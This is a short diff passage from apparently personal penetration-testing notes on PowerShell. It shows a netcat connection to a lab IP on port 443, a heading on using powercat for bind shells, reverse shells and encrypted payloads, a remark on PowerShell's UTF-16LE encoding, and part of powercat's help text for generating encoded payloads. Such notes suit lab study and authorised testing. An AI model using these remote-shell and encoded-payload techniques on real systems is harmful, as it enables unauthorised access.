KiritoLoveAsuna/Penetration-Testing/Powershell.md

 nc -nv 10.11.0.22 443
 ```
 ### load powercat, bindshell, reverse shell, encrypted payloads
+>Generally speaking, Windows PowerShell uses Unicode UTF-16LE encoding by default.
+However, the default encoding used by cmdlets in Windows PowerShell is inconsistent.
 ```
 powercat.ps1
   -ge             Generate Encoded Payload.
 Does the same as -g, but returns a string which